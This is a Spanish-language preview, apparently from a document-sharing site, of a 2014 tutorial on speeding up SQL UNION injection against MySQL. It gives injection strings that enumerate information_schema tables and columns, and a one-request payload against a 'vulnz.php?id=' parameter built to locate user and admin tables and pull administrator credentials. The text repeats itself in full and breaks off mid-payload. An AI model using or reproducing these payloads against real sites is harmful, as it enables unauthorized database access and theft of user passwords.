Docente
Páginas: 2 (468 palabras)
Publicado: 23 de octubre de 2014
Optimización de SQL Union Injection en MYSQL
Sin lugar a dudas, este es el tipo de inyección que mas fácil se puede obtener información, en un par
de consultas se lograría obtener el nombre deusuario y contraseña del administrador del sistema o
de algún usuario con privilegios.
Pero también consta de una etapa que es engorrosa, la obtención de tablas y sus correspondientes
campos.Claramente en una base de datos Mysql Versión 5.x.
Gracias a la base de datos information_schema, podemos obtener las tablas y los campos de la base
de datos.
La sintaxis Común de la obtención de lastablas es la siguiente
SELECT+table_name+FROM+information_schema.TABLES+WHERE+table_schema=DATABASE()
+limit+0,1
Con dicha consulta obtendríamos la primera tabla de la base de datos, luegoaumentando el valor de
limit podríamos obtener las demás tablas.
Luego de encontrar la tabla que nosotros creemos que contendría la información de los usuarios,
procedemos a obtener los campos de dichatabla.
Por ej. , Para obtener los campos de la tabla “usuarios”.
Debemos transformar el nombre usuarios a su valor hexsql.
Usuario: 0×7573756172696F73SELECT+column_name+FROM+information_schema.COLUMNS+WHERE+table_name=0x757375617
2696F73+limit+0,1
Y así tendríamos los datos necesarios para poder generar la consulta final, hacia la base de datos.
Pero luego de hacerlo varias veces endistintas paginas, esta metodología resulta bastante
agobiante,al tener que consultar cada tabla, cada campo por separado, es por ello que desarrolle una
query que muestra la información que anosotros nos interesa en 1 sola petición.
Ejemplo Consulta Final:
Localhost/vulnz.php?
id=1+and+1=0+union+select+all+1,2,group_concat(column_name,0x3A,table_name,0x3C62723E),4,5,6+from+information_schema.columns+where+table_name=(select+table_name
+from+information_schema.tables+where+table_schema=database()
+and+table_name+REGEXP+0x2E2A282875735B75655D7C6C6F675B696F5D6E7C61646D29292E2A+...
Sin lugar a dudas, este es el tipo de inyección que mas fácil se puede obtener información, en un par
de consultas se lograría obtener el nombre deusuario y contraseña del administrador del sistema o
de algún usuario con privilegios.
Pero también consta de una etapa que es engorrosa, la obtención de tablas y sus correspondientes
campos.Claramente en una base de datos Mysql Versión 5.x.
Gracias a la base de datos information_schema, podemos obtener las tablas y los campos de la base
de datos.
La sintaxis Común de la obtención de lastablas es la siguiente
SELECT+table_name+FROM+information_schema.TABLES+WHERE+table_schema=DATABASE()
+limit+0,1
Con dicha consulta obtendríamos la primera tabla de la base de datos, luegoaumentando el valor de
limit podríamos obtener las demás tablas.
Luego de encontrar la tabla que nosotros creemos que contendría la información de los usuarios,
procedemos a obtener los campos de dichatabla.
Por ej. , Para obtener los campos de la tabla “usuarios”.
Debemos transformar el nombre usuarios a su valor hexsql.
Usuario: 0×7573756172696F73SELECT+column_name+FROM+information_schema.COLUMNS+WHERE+table_name=0x757375617
2696F73+limit+0,1
Y así tendríamos los datos necesarios para poder generar la consulta final, hacia la base de datos.
Pero luego de hacerlo varias veces endistintas paginas, esta metodología resulta bastante
agobiante,al tener que consultar cada tabla, cada campo por separado, es por ello que desarrolle una
query que muestra la información que anosotros nos interesa en 1 sola petición.
Ejemplo Consulta Final:
Localhost/vulnz.php?
id=1+and+1=0+union+select+all+1,2,group_concat(column_name,0x3A,table_name,0x3C62723E),4,5,6+from+information_schema.columns+where+table_name=(select+table_name
+from+information_schema.tables+where+table_schema=database()
+and+table_name+REGEXP+0x2E2A282875735B75655D7C6C6F675B696F5D6E7C61646D29292E2A+...
Leer documento completo
Regístrate para leer el documento completo.